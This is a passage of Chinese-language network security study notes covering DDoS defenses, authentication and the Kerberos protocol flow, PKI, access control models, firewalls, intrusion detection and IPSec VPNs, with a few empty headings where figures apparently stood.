    • 限制单 IP 请求频率,网络架构上做好优化,采用负载均衡分流。
    • 防火墙等安全设备上设置禁止 ICMP 包等。
    • 通过 DDoS 硬件防火墙的数据包规则过滤、数据流指纹检测过滤、及数据包内容定制过滤等技术对异常流量进行清洗过滤。
    • 采用 ISP 近源清洗,使用电信运营商提供的近源清洗和流量压制,避免全站服务对所有用户彻底无法访问。这是对超过自身带宽储备和自身 DDoS 防御能力之外超大流量的补充性缓解措施。
  2. 应用层 DDoS 防御

    • 优化操作系统的 TCP/IP 栈。
    • 应用服务器严格限制单个 IP 允许的连接数和 CPU 使用时间。
    • 编写代码时,尽量实现优化并合理使用缓存技术。尽量让网站静态化,减少不必要的动态查询。网站静态化不仅能大大提高抗攻击能力,而且还给骇客入侵带来不少麻烦,至少到现在为止关于 HTML 的溢出还没出现。
    • 增加 WAF(Web Application Firewall)设备,WAF 的中文名称叫做 Web 应用防火墙。Web 应用防火墙是通过执行一系列针对 HTTP / HTTPS 的安全策略来专门为 Web 应用提供保护的一款产品。
    • 使用 CDN / 云清洗,在攻击发生时,进行云清洗。通常云清洗厂商策略有以下几步:预先设置好网站的 CNAME,将域名指向云清洗厂商的 DNS 服务器;在一般情况下,云清洗厂商的 DNS 仍将穿透 CDN 的回源的请求指向源站,在检测到- 攻击发生时,域名指向自己的清洗集群,然后再将清洗后的流量回源。
    • CDN 仅对 Web 类服务有效,针对游戏类 TCP 直连的服务无效。这时可以使用 DNS 引流 + ADS (Anti-DDoS System) 设备来清洗,还有在客户端和服务端通信协议做处理(如:封包加标签,依赖信息对称等)。

0x09 身份认证

AAA

用户对资源的访问过程:AAA

  • 认证(Authentication)

    在做任何动作之前必须识别动作执行者的真实身份。又称鉴别、确认。主要是通过标识符鉴别用户身份,防止攻击者假冒合法用户获得访问权限。

  • 授权(Authorization)

    当用户被确认合法后,赋予该用户进行文件和数据等的操作权限,包括读、写、执行及从属权等。

  • 审计/记账(Accounting)

    每个人都应该为自己所做的操作负责,所以在做完事情之后要留下记录,以便核查责任。

常用身份认证技术

身份认证:验证一个主体身份的真实性或证实某事件、某消息是否属实的过程,通过验证一个或多个参数的有效性,来验证被验证者是否名副其实。

  1. 知识证明 —— 基于被验证者所知道的

    • 基于口令的认证
      • 简单口令认证
      • 基于单向函数的口令认证
        口令认证:

        口令更新:
      • 一次性口令认证
        S/KEY 一次性口令系统。
  2. 持有证明 —— 基于被验证者所拥有的

  3. 属性证明 —— 基于被验证者的生物特征

Kerberos 协议

Kerberos: 基于可信第三方(Trusted Third Party, TTP)的认证协议;基于对称加密技术

Kerberos 目标是把 Unix 认证、授权、审计的功能拓展到网络环境,实现集中的身份认证和密钥分配,用户只需输入一次身份验证信息,就可以访问多个服务。

基本思想(假设):能正确对信息进行解密的用户即为合法用户。

用户在访问应用服务器之前,必须从第三方 (Kerberos 服务器) 获取该应用服务器的授权票据 (Ticket)。

Kerberos 认证协议包含 3 个子协议,称之为交换

  1. 认证服务器交换(AS 交换)

  2. 票据许可服务器交换(TGS 交换)

  3. 客户/服务器认证应用交换(AP 交换)

整体流程

  1. 登录:客户端用户 A 输入用户名、密码

  2. 认证:系统验证客户端用户 A身份

  3. 授权:系统授权客户端用户 A访问服务 S

  4. 请求服务:客户端用户 A服务 S发送请求

参与的角色

  • Client: Application Client 应用客户端

  • AS: Authentication Server 用来认证用户身份

  • TGS: Ticket-Granting Service 用来授权服务访问

  • SS: Service Server 用户所请求的服务

* KDC:密钥分发中心。

* 票据(Tikcet):一种临时的证书,用 TGS 或应用服务器的密钥加密,分别为 TGS 票据和服务票据。

详细流程

  1. 用户登录

    • 用户登录阶段,通常由用户输入用户名密码信息。
    • 在客户端侧,用户输入的密码信息被通过一个单向 Hash 函数生成一个Client密钥
  2. 请求身份认证

    2.1 客户端向AS发送认证请求

    • 客户端为执行登录操作的用户向 AS 发送认证请求
    • 请求中带有用户名信息,用户名以明文形式发送到客户端。

      Client 往 AS 发送认证请求时并未发送密码密钥信息。

    2.2 AS 确认 Client 端登录者用户身份

    • AS收到用户认证请求之后,根据请求中的用户名信息,从数据库中查找该用户名是否存在。
    • 如果用户名存在,则对应的密码也可以从数据库中获取到。AS 利用相同的单向 Hash 函数为密码生成一个秘钥,如果第1步中用户提供的密码信息正确,该秘钥与用户登录章节中的Client密钥相同。
    • AS 为 Client 响应如下消息:
      • Msg A 使用Client密钥加密的Client/TGS SessionKey
      • Msg B 使用TGS密钥加密的TGT(Ticket-Granting-Ticket),因此该消息 Client 不可解析。
        TGT中包含如下信息:
        • Client/TGS SessionKey
        • Client ID
        • Ticket有效时间
        • Client网络地址
    • Client 收到 AS 的响应消息以后,利用自身的 Client密钥 可以对 Msg A 进行解密,这样可以获取到Client/TGS SessionKey。但由于 Msg B 是使用 TGS密钥 加密的,Client 无法对其解密。
      1. AS 响应的消息中有一条是属于 Client 的,但另外一条却属于 TGS。
      2. Client/TGS SessionKey 出现了两个 Copy,一个给 Client 端,一个给 TGS 端。
      3. 本文中提及的加密,如无特殊说明,均采用的是对称加密算法
  3. 请求服务授权

    3.1 客户端向 TGS 发送请求服务授权请求

    客户端发送的请求中包含如下两个消息:

    • Msg C
      • 要请求的服务 ID, 即 Service ID
      • 上一步 2.2 中由 AS 为 Client 提供的 TGT
    • Msg D
      • 使用 Client/TGS SessionKey 加密的 Authenticator 1 {Client ID, Timestamp}。

    3.2 TGS 为 Client 响应服务授权票据

    TGS 为 Client 响应的消息包括:

    • Msg E 使用 Service密钥 加密的 Client-To-Server Ticket, 该 Ticket 中包含了如下信息:
      • Client/Server SessionKey
      • Client网络地址
      • Ticket有效时间
      • Client ID
    • Msg F 使用 Client/TGS SessionKey 加密的 Client/Server SessionKey

    Msg F使用了Client/TGS SessionKey加密,因此,该消息对 Client 可见。Client 对其解密以后可获取到 Client/Server SessionKey
    而 Msg E 使用了Service密钥 加密,该消息可视作是 TGS 给 Service Server 的消息,只不过由 Client 一起携带。

  4. 发送服务请求

    4.1 Client 向 SS(Service Server) 发送服务请求

    发送的消息中包括:

    • Msg E 上一步 3.2 中,TGS 为 Client 响应的消息 Msg E。该消息可以理解为由 Client 为 SS 携带的消息。
    • Msg G 由 Client/Server SessionKey 加密的 Authenticator 2,包含 {Client ID, Timestamp} 信息。
      这里的 Authenticator 2 区别于前面 3.1 步骤中的 Authenticator 1。

    4.2 SS 响应 Client

    SS 收到客户端的服务请求之后,先利用自身的 Service密钥Msg E 进行解密,提取出 Client-To-Server Ticket, 在 3.2 步骤中,提到了该 Ticket 中包含了 Client/Server SessionKey 以及 Client ID 信息。
    SS 使用 Client/Server SessionKey 解密 Msg G,提取 Client ID 信息,而后将该 Client ID 与 Client-To-Server Ticket 中的 Client ID 进行比对,如果匹配则说明 Client 拥有正确的Client/Server SessionKey
    而后,SS 向 Client 响应 Msg H(包含使用Client/Server SessionKey加密的 Timestamp 信息)。
    Client 收到 SS 的响应消息 Msg H 之后,再使用Client/Server SessionKey对其解密,提取 Timestamp 信息,然后确认该信息与 Client 发送的 Authenticator 2 中的 Timestamp 信息一致。
    如上信息可以看出来,该交互过程起到了ClientSS之间的双向认证作用。
    * 图解Kerberos协议原理

PKI 原理

公钥基础设施 PKI(Public Key Infrastructure):以公钥算法为中心的密钥管理体系,能提供公钥加密和数字证书服务,采用证书管理公钥,通过可信任第三方 CA (Ctificate Authority) 把用户公钥和用户的其他标识信息(比如 e-mail、身份证等)捆绑在一起。

  • 当进行安全通信时,发送方只需要得到接收方公钥的一个拷贝。

  • 公钥一般以数字证书的方式存在,由 CA 签署。

  • CA 集中管理用户的公钥、过期时间和其他数字证书中包含的信息。

用户获得公钥的方式:

  • 轻量目录访问协议(Lightweight Directory Access Protocol, LDAP): 最常用,可从证书库获得数字证书数字证书作废列表(Certificate Revocation Lists, CRLs).

  • S/MIME(Secure/Multipurpose Internet Mail Extension,增强安全邮件协议)协议:在用户之间交换密钥。

用户得到接收方的数字证书以后,就可以使用该公钥加密消息,发送给对方。对方只有具备响应的私钥,才能把加密消息打开。

对方可以把要发送的消息用私钥签名,拥有他的数字证书的用户能对消息进行验证。

挑战响应机制

基于挑战/应答属于密码鉴别的一种。特定是密码不在网络上传输。该认证机制中认证者(服务器)每次向被认证者(客户端)发送一个不同的挑战字串,客户端收到这个挑战字串后,按照双方事先协商好的方法应答。挑战相当于咨询,应答相当于回答。

  1. 客户端向服务器端发错请求,要求进行身份验证。
  2. 服务器从数据库中查找用户名是否合法,若不合法则不做处理
  3. 服务器产生一个挑战随机数,发给客户端,作为提问
  4. 客户端使用用户名+H(以共享密钥+挑战) 做应答。
  5. 服务器收到应答和自己计算的比较,相等则认证通过,反之则失败。
  6. 服务器挑战客户端成功还是失败。

之后客户端不定时发送认证请求。

0x0A 访问控制

概念

访问控制 (Access Control) 在身份认证的基础上,依据授权对提出的资源访问请求加以控制。对机密性、完整性起直接作用,是针对越权使用资源的防御措施。

常见策略模型

  • 自主访问控制 (Discretionary Access Control, DAC)

  • 强制型访问控制 (Mandatory Access Control, MAC)

  • 基于角色的访问控制 (Role-Based Access Control, RBAC)

  • 基于属性的访问控制 (Attribute-Based Access Control, ABAC)

访问控制机制

常见的访问控制机制包括:

  • 访问控制列表 ACL (Access Control Lists, ACL)

  • 能力表

  • 锁与钥匙

  • 保护环

* 访问控制的基本原则:

  1. 最小特权原则 (Least Privilege)

    给予主体必不可少的特权,只给主体必不可少的特权。

  2. 多人负责原则

    授权分散化,使得没有独立个体拥有重要密钥的完整拷贝。

  3. 职责分离原则

    将不同的责任分配给不同的人员互相牵制,消除一个人执行两项不相容任务的风险。

计算机安全形式化模型

  1. 机密性安全策略 Bell-LaPadula 模型(不上读、不下写 -> 机密性)

  2. 完整性安全策略 Biba 模型(不下读、不上写 -> 完整性)

0x0B 防火墙与入侵检测

防火墙基本原理

防火墙 (Firewall) 是位于两个(或多个)网络间实施网间访问控制的组件的集合。

  • 内网和外网的所有数据流必须经过防火墙。

  • 只有符合安全策略的数据流才能通过防火墙。

  • 防火墙自身对渗透 (Pentration) 是免疫的。

实现数据流控制通过预先设定的安全规则来实现。

安全规则由匹配条件处理方式两部分组成:

  • 如果满足某种条件,将执行某种操作(Accept、Reject、Drop)。
  • 规则根据组织的访问控制策略来制定。

* 两种基本策略:

  1. 默认允许原则

    没有明确禁止的都是允许的。

  2. 默认拒绝原则

    没有明确允许的都是禁止的。

防火墙技术分类

  1. 包过滤防火墙 (Packet Filtering)

    工作在网络层和传输层,设定访问控制列表 ACL (Access Control List),检查所有通过的数据包,并按照给定的规则进行访问控制和过滤。

    * Remark:包过滤规则按一定顺序存储。

    • 静态包过滤防火墙

    • 动态包过滤防火墙(状态检测防火墙)

      跟踪连接状态(序列号),并根据需要可动态的在过滤规则中增加和更新条目。

  2. 代理技术

    通过在主机上运行代理服务程序,直接对特定的应用层进行服务,因此也称为应用型防火墙/应用级网关,能够完全控制网络信息的交换,控制会话过程。

    • 应用层代理(应用网关、代理服务器)
    • 电路级代理(NAT
      监控受信任的客户或服务器与不受信任的主机间的 TCP 握手信息,以决定会话是否合法。
      支持网络地址转换(NAT, Network Address Translation),一种将私有 IP 地址转化为合法广域网 IP 地址的转换技术,被广泛使用。
  3. 混合型防火墙

防火墙的配置方案

  1. 屏蔽路由器

    最简单的防火墙配置方案,直接在内网和外网之间加装一个包过滤路由器或应用网关。

  2. 双宿主机(Dual-Homed Host)模式


    双宿主机即拥有两个网络接口的计算机。采用主机代替路由器执行安全控制功能,类似于包过滤防火墙,是外部用户进入内部网络的唯一通道。
    双宿主机用两个网络适配器分别连接两个网络,又称堡垒主机。堡垒主机运行防火墙软件,可转发数据,提供服务等。
    * 堡垒主机(Bastion Host)是一种被强化的可以防御进攻的计算机,作为进入内部网络的一个检查点,以达到把整个网络的安全问题集中在某个主机上解决,从而省时省力,不用考虑其它主机的安全的目的。

  3. 屏蔽主机模式

    包过滤路由器连接外网,堡垒主机装在内网。过滤路由器是否配置正确是安全与否的关键。

    • 在路由器上设置过滤规则,并使堡垒主机成为从外网唯一可直达的主机,确保内网不受未被授权的外部用户的攻击。
    • 实现了网络层和应用层的安全,比单独的包过滤或应用网关更安全。
  1. 屏蔽子网模式

    比较流行的一种结构,采用两个包过滤器和一个堡垒主机,在内外部网络建立一个被隔离的子网,成为 DMZ (非军事区、隔离区,demilitarized zone)

    DMZ: 未解决安装防火墙后外网不能访问内网服务器的问题而设立的一个非安全系统与安全系统之间的缓冲区,位于企业内部网络和外部网络之间的小型网络区域内,放置一些必须公开的服务器设施,比如企业 Web 服务器、FTP 服务器等。

* 防火墙的主要功能:

  1. 网络安全的屏障

  2. 强化网络安全策略

  3. 对网络存取和访问进行监控审计

  4. 放置内部信息的外泄

入侵检测工作原理

入侵检测系统 (Intrusion Detection System, IDS),是一种能对潜在的入侵行为作出记录和预测的智能化、自动化的软件或硬件系统。作为一种主动防御技术,是传统计算机安全机制的重要补充

主要通过监控网络、系统的状态、行为以及系统的使用情况,来检测系统用户的越权使用以及系统外部的入侵者利用系统的安全缺陷对系统进行入侵的企图。

入侵检测分类

  1. 按照分析方法

    • 异常检测模型(Anormal Detection)
      首先总结正常操作具有的特征(用户轮廓),当用户活动与正常行为有重大偏离时即被认为是入侵。

    • 误用检测模型(Misuse Detection)
      收集非正常操作的行为特征,建立相关特征库。当监测的用户或系统行为与库中的记录匹配时,就认为是入侵,也称特征检测(Signature Detection)、模式发现。

  2. 根据数据来源

    • 基于主机(Host-Based)的入侵检测系统, HIDS
      系统获取数据的依据是系统所运行的主机,保护的目标也是系统运行所在的主机,一般读取主机的日志文件发出警告。

    • 基于网络(Network-Based)的入侵检测系统,NIDS
      系统获取的数据为网络传输的数据包,保护的是网络的运行,将网卡监听设置为混杂模式,并在攻击穿越网络时对其进行监听。

    • 混合型

0x0C VPN

VPN 的概念

虚拟专用网(Virtual Private Network, VPN) 是在公共网络上传输私有通信的方法。VPN 通常使用(加密的)隧道将两个或多个专用网络连接起来。

VPN 的分类

  1. 按是否采用加密技术

    • 加密 VPN
      采用数据加密实现通信安全(IPSec、SSL)。

    • 非加密 VPN
      使两个或多个专用网络连接起来,以便用户可以在各自的网络中无缝地访问资源(GRE、MPLS 多协议标签交换)。

  2. Site-to-site VPN:企业内部 VPN、企业外部 VPN; 远程访问 VPN(拨号 VPN, VPDN)。

主要隧道协议

IPSec

IPSec 适用于构建 VPN 的一系列协议,正在成为创建 VPN 的标准。为提供加密服务而开发,支持认证、完整性、访问控制以及数据统一性。IPSec 只允许 IP 数据的封装和加密。

主要功能访问控制、无连接的完整性、数据源认证、防止重放攻击、机密性

体系结构

  1. Internet 密钥交换协议 IKE 提供协商安全参数和创建认证密钥等。

  2. 封装协议:

    • 负载安全封装(ESP, Encapsulating Security Payload) 提供加密、认证和数据保护。

    • 认证报头协议(AH, Authentication Header) 提供认证和数据保护。

工作模式

  1. 传输模式(Transpot Mode)

    两台主机之间(点到点)传递的数据加密。

  2. 隧道模式(Tunnel Mode)

    两个不同网段(站点到站点)所传送的数据内容的加密或者两个私有 IP 网段穿越 Internet 连接。

工作流程

* ComyDream 的总结:网络安全复习笔记.